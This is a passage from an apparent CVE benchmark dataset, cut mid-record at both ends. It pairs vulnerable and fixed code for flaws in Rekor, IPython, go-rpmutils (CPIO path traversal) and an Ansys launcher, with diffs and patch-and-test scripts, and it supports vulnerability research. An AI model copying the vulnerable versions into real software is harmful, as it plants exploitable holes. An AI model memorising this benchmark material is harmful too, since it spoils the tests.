Modeler\n Instance of the Geometry service.\n \"\"\"\n from ansys.geometry.core.modeler import Modeler\n\n if os.name != \"nt\": # pragma: no cover\n raise RuntimeError(\"Method 'prepare_and_start_backend' is only available on Windows.\")\n\n port = _check_port_or_get_one(port)\n installations = get_available_ansys_installations()\n if product_version != None:\n _check_version_is_available(product_version, installations)\n else:\n product_version = get_latest_ansys_installation()[0]\n _check_minimal_versions(product_version)\n\n args = []\n env_copy = _get_common_env(\n host=host,\n port=port,\n enable_trace=enable_trace,\n log_level=log_level,\n logs_folder=logs_folder,\n )\n\n if backend_type == BackendType.DISCOVERY:\n args.append(os.path.join(installations[product_version], DISCOVERY_FOLDER, DISCOVERY_EXE))\n if hidden is True:\n args.append(BACKEND_DISCOVERY_HIDDEN)\n\n # Here begins the spaceclaim arguments.\n args.append(BACKEND_SPACECLAIM_OPTIONS)\n args.append(\n BACKEND_ADDIN_MANIFEST_ARGUMENT\n + _manifest_path_provider(product_version, installations, manifest_path)\n )\n env_copy[BACKEND_API_VERSION_VARIABLE] = str(api_version)\n\n elif backend_type == BackendType.SPACECLAIM:\n args.append(os.path.join(installations[product_version], SPACECLAIM_FOLDER, SPACECLAIM_EXE))\n if hidden is True:\n args.append(BACKEND_SPACECLAIM_HIDDEN)\n args.append(BACKEND_SPLASH_OFF)\n args.append(\n BACKEND_ADDIN_MANIFEST_ARGUMENT\n + _manifest_path_provider(product_version, installations, manifest_path)\n )\n env_copy[BACKEND_API_VERSION_VARIABLE] = str(api_version)\n env_copy[BACKEND_SPACECLAIM_HIDDEN_ENVVAR_KEY] = BACKEND_SPACECLAIM_HIDDEN_ENVVAR_VALUE\n\n elif backend_type == BackendType.WINDOWS_SERVICE:\n latest_version = get_latest_ansys_installation()[0]\n args.append(\n os.path.join(\n installations[latest_version], WINDOWS_GEOMETRY_SERVICE_FOLDER, GEOMETRY_SERVICE_EXE\n )\n )\n else:\n raise RuntimeError(\n f\"Cannot connect to backend {backend_type.name} using ``prepare_and_start_backend()``\"\n )\n\n LOG.info(f\"Launching ProductInstance for {backend_type.name}\")\n LOG.debug(f\"Args: {args}\")\n LOG.debug(f\"Environment variables: {env_copy}\")\n\n instance = ProductInstance(_start_program(args, env_copy).pid)\n\n # Verify that the backend is ready to accept connections\n # before returning the Modeler instance.\n LOG.info(\"Waiting for backend to be ready...\")\n _wait_for_backend(host, port, timeout)\n\n return Modeler(\n host=host, port=port, timeout=timeout, product_instance=instance, backend_type=backend_type\n )"}, {"id": "fix_py_385_2", "commit": "f82346b9432b06532e84f3278125f5879b4e9f3f", "file_path": "src/ansys/geometry/core/connection/product_instance.py", "start_line": 406, "end_line": 429, "snippet": "def _start_program(args: List[str], local_env: Dict[str, str]) -> subprocess.Popen:\n \"\"\"\n Start the program where the path is the first item of the ``args`` array argument.\n\n Parameters\n ----------\n args : List[str]\n List of arguments to be passed to the program. The first list's item shall\n be the program path.\n local_env : Dict[str,str]\n Environment variables to be passed to the program.\n\n Returns\n -------\n subprocess.Popen\n The subprocess object.\n \"\"\"\n return subprocess.Popen(\n args,\n stdin=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n env=local_env,\n )"}], "vul_patch": "--- a/src/ansys/geometry/core/connection/product_instance.py\n+++ b/src/ansys/geometry/core/connection/product_instance.py\n@@ -72,6 +72,9 @@\n \"\"\"\n from ansys.geometry.core.modeler import Modeler\n \n+ if os.name != \"nt\": # pragma: no cover\n+ raise RuntimeError(\"Method 'prepare_and_start_backend' is only available on Windows.\")\n+\n port = _check_port_or_get_one(port)\n installations = get_available_ansys_installations()\n if product_version != None:\n\n--- a/src/ansys/geometry/core/connection/product_instance.py\n+++ b/src/ansys/geometry/core/connection/product_instance.py\n@@ -17,10 +17,8 @@\n \"\"\"\n return subprocess.Popen(\n args,\n- shell=os.name != \"nt\",\n stdin=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n env=local_env,\n )\n-\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-33199", "cve_description": "Rekor's goals are to provide an immutable tamper resistant ledger of metadata generated within a software projects supply chain. A malformed proposed entry of the `intoto/v0.0.2` type can cause a panic on a thread within the Rekor process. The thread is recovered so the client receives a 500 error message and service still continues, so the availability impact of this is minimal. This has been fixed in v1.2.0 of Rekor. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-617": {"name": "Reachable Assertion", "description": "The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary."}}, "repo": "https://github.com/sigstore/rekor", "patch_url": ["https://github.com/sigstore/rekor/commit/140c5add105179e5ffd9e3e114fd1b6b93aebbd4"], "programing_language": "Go", "vul_func": [{"id": "vul_go_286_1", "commit": "85bb2bc7a35dcc94cd94e18984711806f437dcb6", "file_path": "pkg/types/dsse/v0.0.1/entry.go", "start_line": 74, "end_line": 145, "snippet": "func (v V001Entry) IndexKeys() ([]string, error) {\n\tvar result []string\n\n\tfor _, sig := range v.DSSEObj.Signatures {\n\t\tkeyObj, err := x509.NewPublicKey(bytes.NewReader(*sig.Verifier))\n\t\tif err != nil {\n\t\t\treturn result, err\n\t\t}\n\n\t\tcanonKey, err := keyObj.CanonicalValue()\n\t\tif err != nil {\n\t\t\treturn result, fmt.Errorf(\"could not canonicalize key: %w\", err)\n\t\t}\n\n\t\tkeyHash := sha256.Sum256(canonKey)\n\t\tresult = append(result, \"sha256:\"+hex.EncodeToString(keyHash[:]))\n\n\t\tresult = append(result, keyObj.Subjects()...)\n\t}\n\n\tif v.DSSEObj.PayloadHash != nil {\n\t\tpayloadHashKey := strings.ToLower(fmt.Sprintf(\"%s:%s\", *v.DSSEObj.PayloadHash.Algorithm, *v.DSSEObj.PayloadHash.Value))\n\t\tresult = append(result, payloadHashKey)\n\t}\n\n\tif v.DSSEObj.EnvelopeHash != nil {\n\t\tenvelopeHashKey := strings.ToLower(fmt.Sprintf(\"%s:%s\", *v.DSSEObj.EnvelopeHash.Algorithm, *v.DSSEObj.EnvelopeHash.Value))\n\t\tresult = append(result, envelopeHashKey)\n\t}\n\n\tif v.env == nil {\n\t\tlog.Logger.Info(\"DSSEObj content or DSSE envelope is nil, returning partial set of keys\")\n\t\treturn result, nil\n\t}\n\n\tswitch v.env.PayloadType {\n\tcase in_toto.PayloadType:\n\n\t\tif v.env.Payload == \"\" {\n\t\t\tlog.Logger.Info(\"DSSEObj DSSE payload is empty\")\n\t\t\treturn result, nil\n\t\t}\n\t\tdecodedPayload, err := v.env.DecodeB64Payload()\n\t\tif err != nil {\n\t\t\treturn result, fmt.Errorf(\"could not decode envelope payload: %w\", err)\n\t\t}\n\t\tstatement, err := parseStatement(decodedPayload)\n\t\tif err != nil {\n\t\t\treturn result, err\n\t\t}\n\t\tfor _, s := range statement.Subject {\n\t\t\tfor alg, ds := range s.Digest {\n\t\t\t\tresult = append(result, alg+\":\"+ds)\n\t\t\t}\n\t\t}\n\t\t// Not all in-toto statements will contain a SLSA provenance predicate.\n\t\t// See https://github.com/in-toto/attestation/blob/main/spec/README.md#predicate\n\t\t// for other predicates.\n\t\tif predicate, err := parseSlsaPredicate(decodedPayload); err == nil {\n\t\t\tif predicate.Predicate.Materials != nil {\n\t\t\t\tfor _, s := range predicate.Predicate.Materials {\n\t\t\t\t\tfor alg, ds := range s.Digest {\n\t\t\t\t\t\tresult = append(result, alg+\":\"+ds)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\tdefault:\n\t\tlog.Logger.Infof(\"Unknown DSSE envelope payloadType: %s\", v.env.PayloadType)\n\t}\n\treturn result, nil\n}"}, {"id": "vul_go_286_2", "commit": "85bb2bc7a35dcc94cd94e18984711806f437dcb6", "file_path": "pkg/types/dsse/v0.0.1/entry.go", "start_line": 163, "end_line": 206, "snippet": "func (v *V001Entry) Unmarshal(pe models.ProposedEntry) error {\n\tit, ok := pe.(*models.DSSE)\n\tif !ok {\n\t\treturn errors.New(\"cannot unmarshal non DSSE v0.0.1 type\")\n\t}\n\n\tdsseObj := &models.DSSEV001Schema{}\n\n\tif err := types.DecodeEntry(it.Spec, dsseObj); err != nil {\n\t\treturn err\n\t}\n\n\t// field validation\n\tif err := dsseObj.Validate(strfmt.Default); err != nil {\n\t\treturn err\n\t}\n\n\t// either we have just proposed content or the canonicalized fields\n\tif dsseObj.ProposedContent == nil {\n\t\t// then we need canonicalized fields, and all must be present (if present, they would have been validated in the above call to Validate())\n\t\tif dsseObj.EnvelopeHash == nil || dsseObj.PayloadHash == nil || len(dsseObj.Signatures) == 0 {\n\t\t\treturn errors.New(\"either proposedContent or envelopeHash, payloadHash, and signatures must be present\")\n\t\t}\n\t\tv.DSSEObj = *dsseObj\n\t\treturn nil\n\t}\n\t// if we're here, then we're trying to propose a new entry so we check to ensure client's aren't setting server-side computed fields\n\tif dsseObj.EnvelopeHash != nil || dsseObj.PayloadHash != nil || len(dsseObj.Signatures) != 0 {\n\t\treturn errors.New(\"either proposedContent or envelopeHash, payloadHash, and signatures must be present but not both\")\n\t}\n\n\tenv := &dsse.Envelope{}\n\tif err := json.Unmarshal([]byte(*dsseObj.ProposedContent.Envelope), env); err != nil {\n\t\treturn err\n\t}\n\n\tif len(env.Signatures) == 0 {\n\t\treturn errors.New(\"DSSE envelope must contain 1 or more signatures\")\n\t}\n\n\tallPubKeyBytes := make([][]byte, 0)\n\tfor _, publicKey := range dsseObj.ProposedContent.Verifiers {\n\t\tallPubKeyBytes = append(allPubKeyBytes, publicKey)\n\t}"}], "fix_func": [{"id": "fix_go_286_1", "commit": "140c5add105179e5ffd9e3e114fd1b6b93aebbd4", "file_path": "pkg/types/dsse/v0.0.1/entry.go", "start_line": 74, "end_line": 148, "snippet": "func (v V001Entry) IndexKeys() ([]string, error) {\n\tvar result []string\n\n\tfor _, sig := range v.DSSEObj.Signatures {\n\t\tif sig == nil || sig.Verifier == nil {\n\t\t\treturn result, errors.New(\"missing or malformed public key\")\n\t\t}\n\t\tkeyObj, err := x509.NewPublicKey(bytes.NewReader(*sig.Verifier))\n\t\tif err != nil {\n\t\t\treturn result, err\n\t\t}\n\n\t\tcanonKey, err := keyObj.CanonicalValue()\n\t\tif err != nil {\n\t\t\treturn result, fmt.Errorf(\"could not canonicalize key: %w\", err)\n\t\t}\n\n\t\tkeyHash := sha256.Sum256(canonKey)\n\t\tresult = append(result, \"sha256:\"+hex.EncodeToString(keyHash[:]))\n\n\t\tresult = append(result, keyObj.Subjects()...)\n\t}\n\n\tif v.DSSEObj.PayloadHash != nil {\n\t\tpayloadHashKey := strings.ToLower(fmt.Sprintf(\"%s:%s\", *v.DSSEObj.PayloadHash.Algorithm, *v.DSSEObj.PayloadHash.Value))\n\t\tresult = append(result, payloadHashKey)\n\t}\n\n\tif v.DSSEObj.EnvelopeHash != nil {\n\t\tenvelopeHashKey := strings.ToLower(fmt.Sprintf(\"%s:%s\", *v.DSSEObj.EnvelopeHash.Algorithm, *v.DSSEObj.EnvelopeHash.Value))\n\t\tresult = append(result, envelopeHashKey)\n\t}\n\n\tif v.env == nil {\n\t\tlog.Logger.Info(\"DSSEObj content or DSSE envelope is nil, returning partial set of keys\")\n\t\treturn result, nil\n\t}\n\n\tswitch v.env.PayloadType {\n\tcase in_toto.PayloadType:\n\n\t\tif v.env.Payload == \"\" {\n\t\t\tlog.Logger.Info(\"DSSEObj DSSE payload is empty\")\n\t\t\treturn result, nil\n\t\t}\n\t\tdecodedPayload, err := v.env.DecodeB64Payload()\n\t\tif err != nil {\n\t\t\treturn result, fmt.Errorf(\"could not decode envelope payload: %w\", err)\n\t\t}\n\t\tstatement, err := parseStatement(decodedPayload)\n\t\tif err != nil {\n\t\t\treturn result, err\n\t\t}\n\t\tfor _, s := range statement.Subject {\n\t\t\tfor alg, ds := range s.Digest {\n\t\t\t\tresult = append(result, alg+\":\"+ds)\n\t\t\t}\n\t\t}\n\t\t// Not all in-toto statements will contain a SLSA provenance predicate.\n\t\t// See https://github.com/in-toto/attestation/blob/main/spec/README.md#predicate\n\t\t// for other predicates.\n\t\tif predicate, err := parseSlsaPredicate(decodedPayload); err == nil {\n\t\t\tif predicate.Predicate.Materials != nil {\n\t\t\t\tfor _, s := range predicate.Predicate.Materials {\n\t\t\t\t\tfor alg, ds := range s.Digest {\n\t\t\t\t\t\tresult = append(result, alg+\":\"+ds)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\tdefault:\n\t\tlog.Logger.Infof(\"Unknown DSSE envelope payloadType: %s\", v.env.PayloadType)\n\t}\n\treturn result, nil\n}"}, {"id": "fix_go_286_2", "commit": "140c5add105179e5ffd9e3e114fd1b6b93aebbd4", "file_path": "pkg/types/dsse/v0.0.1/entry.go", "start_line": 166, "end_line": 213, "snippet": "func (v *V001Entry) Unmarshal(pe models.ProposedEntry) error {\n\tit, ok := pe.(*models.DSSE)\n\tif !ok {\n\t\treturn errors.New(\"cannot unmarshal non DSSE v0.0.1 type\")\n\t}\n\n\tdsseObj := &models.DSSEV001Schema{}\n\n\tif err := types.DecodeEntry(it.Spec, dsseObj); err != nil {\n\t\treturn err\n\t}\n\n\t// field validation\n\tif err := dsseObj.Validate(strfmt.Default); err != nil {\n\t\treturn err\n\t}\n\n\t// either we have just proposed content or the canonicalized fields\n\tif dsseObj.ProposedContent == nil {\n\t\t// then we need canonicalized fields, and all must be present (if present, they would have been validated in the above call to Validate())\n\t\tif dsseObj.EnvelopeHash == nil || dsseObj.PayloadHash == nil || len(dsseObj.Signatures) == 0 {\n\t\t\treturn errors.New(\"either proposedContent or envelopeHash, payloadHash, and signatures must be present\")\n\t\t}\n\t\tv.DSSEObj = *dsseObj\n\t\treturn nil\n\t}\n\t// if we're here, then we're trying to propose a new entry so we check to ensure client's aren't setting server-side computed fields\n\tif dsseObj.EnvelopeHash != nil || dsseObj.PayloadHash != nil || len(dsseObj.Signatures) != 0 {\n\t\treturn errors.New(\"either proposedContent or envelopeHash, payloadHash, and signatures must be present but not both\")\n\t}\n\n\tenv := &dsse.Envelope{}\n\tif err := json.Unmarshal([]byte(*dsseObj.ProposedContent.Envelope), env); err != nil {\n\t\treturn err\n\t}\n\n\tif len(env.Signatures) == 0 {\n\t\treturn errors.New(\"DSSE envelope must contain 1 or more signatures\")\n\t}\n\n\tallPubKeyBytes := make([][]byte, 0)\n\tfor _, publicKey := range dsseObj.ProposedContent.Verifiers {\n\t\tif publicKey == nil {\n\t\t\treturn errors.New(\"an invalid null verifier was provided in ProposedContent\")\n\t\t}\n\n\t\tallPubKeyBytes = append(allPubKeyBytes, publicKey)\n\t}"}], "vul_patch": "--- a/pkg/types/dsse/v0.0.1/entry.go\n+++ b/pkg/types/dsse/v0.0.1/entry.go\n@@ -2,6 +2,9 @@\n \tvar result []string\n \n \tfor _, sig := range v.DSSEObj.Signatures {\n+\t\tif sig == nil || sig.Verifier == nil {\n+\t\t\treturn result, errors.New(\"missing or malformed public key\")\n+\t\t}\n \t\tkeyObj, err := x509.NewPublicKey(bytes.NewReader(*sig.Verifier))\n \t\tif err != nil {\n \t\t\treturn result, err\n\n--- a/pkg/types/dsse/v0.0.1/entry.go\n+++ b/pkg/types/dsse/v0.0.1/entry.go\n@@ -40,5 +40,9 @@\n \n \tallPubKeyBytes := make([][]byte, 0)\n \tfor _, publicKey := range dsseObj.ProposedContent.Verifiers {\n+\t\tif publicKey == nil {\n+\t\t\treturn errors.New(\"an invalid null verifier was provided in ProposedContent\")\n+\t\t}\n+\n \t\tallPubKeyBytes = append(allPubKeyBytes, publicKey)\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-21699", "cve_description": "IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/ipython/ipython", "patch_url": ["https://github.com/ipython/ipython/commit/46a51ed69cdf41b4333943d9ceeb945c4ede5668", "https://github.com/ipython/ipython/commit/5fa1e409d2dc126c456510c16ece18e08b524e5b", "https://github.com/ipython/ipython/commit/a06ca837273271b4acb82c29be97c0b6d12a30ea", "https://github.com/ipython/ipython/commit/67ca2b3aa9039438e6f80e3fccca556f26100b4d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_13_1", "commit": "50b3d1f", "file_path": "IPython/core/profiledir.py", "start_line": 184, "end_line": 209, "snippet": " def find_profile_dir_by_name(cls, ipython_dir, name=u'default', config=None):\n \"\"\"Find an existing profile dir by profile name, return its ProfileDir.\n\n This searches through a sequence of paths for a profile dir. If it\n is not found, a :class:`ProfileDirError` exception will be raised.\n\n The search path algorithm is:\n 1. ``os.getcwd()``\n 2. ``ipython_dir``\n\n Parameters\n ----------\n ipython_dir : unicode or str\n The IPython directory to use.\n name : unicode or str\n The name of the profile. The name of the profile directory\n will be \"profile_\".\n \"\"\"\n dirname = u'profile_' + name\n paths = [os.getcwd(), ipython_dir]\n for p in paths:\n profile_dir = os.path.join(p, dirname)\n if os.path.isdir(profile_dir):\n return cls(location=profile_dir, config=config)\n else:\n raise ProfileDirError('Profile directory not found in paths: %s' % dirname)"}], "fix_func": [{"id": "fix_py_13_1", "commit": "46a51ed", "file_path": "IPython/core/profiledir.py", "start_line": 184, "end_line": 209, "snippet": " def find_profile_dir_by_name(cls, ipython_dir, name=u'default', config=None):\n \"\"\"Find an existing profile dir by profile name, return its ProfileDir.\n\n This searches through a sequence of paths for a profile dir. If it\n is not found, a :class:`ProfileDirError` exception will be raised.\n\n The search path algorithm is:\n 1. ``os.getcwd()`` # removed for security reason.\n 2. ``ipython_dir``\n\n Parameters\n ----------\n ipython_dir : unicode or str\n The IPython directory to use.\n name : unicode or str\n The name of the profile. The name of the profile directory\n will be \"profile_\".\n \"\"\"\n dirname = u'profile_' + name\n paths = [ipython_dir]\n for p in paths:\n profile_dir = os.path.join(p, dirname)\n if os.path.isdir(profile_dir):\n return cls(location=profile_dir, config=config)\n else:\n raise ProfileDirError('Profile directory not found in paths: %s' % dirname)"}], "vul_patch": "--- a/IPython/core/profiledir.py\n+++ b/IPython/core/profiledir.py\n@@ -5,7 +5,7 @@\n is not found, a :class:`ProfileDirError` exception will be raised.\n \n The search path algorithm is:\n- 1. ``os.getcwd()``\n+ 1. ``os.getcwd()`` # removed for security reason.\n 2. ``ipython_dir``\n \n Parameters\n@@ -17,7 +17,7 @@\n will be \"profile_\".\n \"\"\"\n dirname = u'profile_' + name\n- paths = [os.getcwd(), ipython_dir]\n+ paths = [ipython_dir]\n for p in paths:\n profile_dir = os.path.join(p, dirname)\n if os.path.isdir(profile_dir):\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-21699:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/ipython\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-21699/bin/python -W ignore::UserWarning -m pytest IPython/tests/cve.py\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-21699:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/ipython\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-21699/bin/python -m pytest -v IPython/core/tests/test_profile.py IPython/core/tests/test_application.py"} {"cve_id": "CVE-2020-7667", "cve_description": "In package github.com/sassoftware/go-rpmutils/cpio before version 0.1.0, the CPIO extraction functionality doesn't sanitize the paths of the archived files for leading and non-leading \"..\" which leads in file extraction outside of the current directory. Note: the fixing commit was applied to all affected versions which were re-released.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/sassoftware/go-rpmutils", "patch_url": ["https://github.com/sassoftware/go-rpmutils/commit/a64058cf21b8aada501bba923c9aab66fb6febf0"], "programing_language": "Go", "vul_func": [{"id": "vul_go_211_1", "commit": "e314ffa", "file_path": "cpio/extract.go", "start_line": 42, "end_line": 149, "snippet": "func Extract(rs io.Reader, dest string) error {\n\tlinkMap := make(map[int][]string)\n\n\tstream := NewCpioStream(rs)\n\n\tfor {\n\t\tentry, err := stream.ReadNextEntry()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif entry.Header.filename == TRAILER {\n\t\t\tbreak\n\t\t}\n\n\t\ttarget := path.Join(dest, path.Clean(entry.Header.filename))\n\t\tparent := path.Dir(target)\n\n\t\t// Create the parent directory if it doesn't exist.\n\t\tif _, err := os.Stat(parent); os.IsNotExist(err) {\n\t\t\tif err := os.MkdirAll(parent, 0755); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\n\t\t// FIXME: Need a makedev implementation in go.\n\n\t\tswitch entry.Header.Mode() &^ 07777 {\n\t\tcase S_ISCHR:\n\t\t\tlogger.Debug(\"unpacking char device\")\n\t\t\t// FIXME: skipping due to lack of makedev.\n\t\t\tcontinue\n\t\tcase S_ISBLK:\n\t\t\tlogger.Debug(\"unpacking block device\")\n\t\t\t// FIXME: skipping due to lack of makedev.\n\t\t\tcontinue\n\t\tcase S_ISDIR:\n\t\t\tlogger.Debug(\"unpacking dir\")\n\t\t\tm := os.FileMode(entry.Header.Mode()).Perm()\n\t\t\tif err := os.Mkdir(target, m); err != nil && !os.IsExist(err) {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISFIFO:\n\t\t\tlogger.Debug(\"unpacking named pipe\")\n\t\t\tif err := fileutil.Mkfifo(target, uint32(entry.Header.Mode())); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISLNK:\n\t\t\tlogger.Debug(\"unpacking symlink\")\n\t\t\tbuf := make([]byte, entry.Header.c_filesize)\n\t\t\tif _, err := entry.payload.Read(buf); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := os.Symlink(string(buf), target); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISREG:\n\t\t\tlogger.Debug(\"unpacking regular file\")\n\t\t\t// save hardlinks until after the taget is written\n\t\t\tif entry.Header.c_nlink > 1 && entry.Header.c_filesize == 0 {\n\t\t\t\tlogger.Debug(\"regular file is a hard link\")\n\t\t\t\tl, ok := linkMap[entry.Header.c_ino]\n\t\t\t\tif !ok {\n\t\t\t\t\tl = make([]string, 0)\n\t\t\t\t}\n\t\t\t\tl = append(l, target)\n\t\t\t\tlinkMap[entry.Header.c_ino] = l\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// FIXME: Set permissions on files when creating.\n\t\t\tf, err := os.Create(target)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\twritten, err := io.Copy(f, entry.payload)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif written != int64(entry.Header.c_filesize) {\n\t\t\t\tlogger.Debugf(\"written: %d, filesize: %d\", written, entry.Header.c_filesize)\n\t\t\t\treturn fmt.Errorf(\"short write\")\n\t\t\t}\n\t\t\tif err := f.Close(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Create hardlinks after the file content is written.\n\t\t\tif entry.Header.c_nlink > 1 && entry.Header.c_filesize > 0 {\n\t\t\t\tl, ok := linkMap[entry.Header.c_ino]\n\t\t\t\tif !ok {\n\t\t\t\t\treturn fmt.Errorf(\"hardlinks missing\")\n\t\t\t\t}\n\n\t\t\t\tfor _, t := range l {\n\t\t\t\t\tif err := os.Link(target, t); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"unknown file mode 0%o for %s\",\n\t\t\t\tentry.Header.c_mode, entry.Header.filename)\n\t\t}\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_211_1", "commit": "a64058cf21b8aada501bba923c9aab66fb6febf0", "file_path": "cpio/extract.go", "start_line": 45, "end_line": 158, "snippet": "func Extract(rs io.Reader, dest string) error {\n\tdest = filepath.Clean(filepath.FromSlash(dest))\n\tlinkMap := make(map[int][]string)\n\n\tstream := NewCpioStream(rs)\n\n\tfor {\n\t\tentry, err := stream.ReadNextEntry()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif entry.Header.filename == TRAILER {\n\t\t\tbreak\n\t\t}\n\n\t\t// sanitize path\n\t\ttarget := path.Clean(entry.Header.filename)\n\t\tfor strings.HasPrefix(target, \"../\") {\n\t\t\ttarget = target[3:]\n\t\t}\n\t\ttarget = filepath.Join(dest, filepath.FromSlash(target))\n\t\tif !strings.HasPrefix(target, dest+string(filepath.Separator)) && dest != target {\n\t\t\t// this shouldn't happen due to the sanitization above but always check\n\t\t\treturn fmt.Errorf(\"invalid cpio path %q\", entry.Header.filename)\n\t\t}\n\t\t// Create the parent directory if it doesn't exist.\n\t\tparent := filepath.Dir(target)\n\t\tif err := os.MkdirAll(parent, 0755); err != nil {\n\t\t\treturn err\n\t\t}\n\t\t// FIXME: Need a makedev implementation in go.\n\n\t\tswitch entry.Header.Mode() &^ 07777 {\n\t\tcase S_ISCHR:\n\t\t\tlogger.Debug(\"unpacking char device\")\n\t\t\t// FIXME: skipping due to lack of makedev.\n\t\t\tcontinue\n\t\tcase S_ISBLK:\n\t\t\tlogger.Debug(\"unpacking block device\")\n\t\t\t// FIXME: skipping due to lack of makedev.\n\t\t\tcontinue\n\t\tcase S_ISDIR:\n\t\t\tlogger.Debug(\"unpacking dir\")\n\t\t\tm := os.FileMode(entry.Header.Mode()).Perm()\n\t\t\tif err := os.Mkdir(target, m); err != nil && !os.IsExist(err) {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISFIFO:\n\t\t\tlogger.Debug(\"unpacking named pipe\")\n\t\t\tif err := fileutil.Mkfifo(target, uint32(entry.Header.Mode())); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISLNK:\n\t\t\tlogger.Debug(\"unpacking symlink\")\n\t\t\tbuf := make([]byte, entry.Header.c_filesize)\n\t\t\tif _, err := entry.payload.Read(buf); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := os.Symlink(string(buf), target); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISREG:\n\t\t\tlogger.Debug(\"unpacking regular file\")\n\t\t\t// save hardlinks until after the taget is written\n\t\t\tif entry.Header.c_nlink > 1 && entry.Header.c_filesize == 0 {\n\t\t\t\tlogger.Debug(\"regular file is a hard link\")\n\t\t\t\tl, ok := linkMap[entry.Header.c_ino]\n\t\t\t\tif !ok {\n\t\t\t\t\tl = make([]string, 0)\n\t\t\t\t}\n\t\t\t\tl = append(l, target)\n\t\t\t\tlinkMap[entry.Header.c_ino] = l\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// FIXME: Set permissions on files when creating.\n\t\t\tf, err := os.Create(target)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\twritten, err := io.Copy(f, entry.payload)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif written != int64(entry.Header.c_filesize) {\n\t\t\t\tlogger.Debugf(\"written: %d, filesize: %d\", written, entry.Header.c_filesize)\n\t\t\t\treturn fmt.Errorf(\"short write\")\n\t\t\t}\n\t\t\tif err := f.Close(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Create hardlinks after the file content is written.\n\t\t\tif entry.Header.c_nlink > 1 && entry.Header.c_filesize > 0 {\n\t\t\t\tl, ok := linkMap[entry.Header.c_ino]\n\t\t\t\tif !ok {\n\t\t\t\t\treturn fmt.Errorf(\"hardlinks missing\")\n\t\t\t\t}\n\n\t\t\t\tfor _, t := range l {\n\t\t\t\t\tif err := os.Link(target, t); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"unknown file mode 0%o for %s\",\n\t\t\t\tentry.Header.c_mode, entry.Header.filename)\n\t\t}\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/cpio/extract.go\n+++ b/cpio/extract.go\n@@ -1,4 +1,5 @@\n func Extract(rs io.Reader, dest string) error {\n+\tdest = filepath.Clean(filepath.FromSlash(dest))\n \tlinkMap := make(map[int][]string)\n \n \tstream := NewCpioStream(rs)\n@@ -13,16 +14,21 @@\n \t\t\tbreak\n \t\t}\n \n-\t\ttarget := path.Join(dest, path.Clean(entry.Header.filename))\n-\t\tparent := path.Dir(target)\n-\n+\t\t// sanitize path\n+\t\ttarget := path.Clean(entry.Header.filename)\n+\t\tfor strings.HasPrefix(target, \"../\") {\n+\t\t\ttarget = target[3:]\n+\t\t}\n+\t\ttarget = 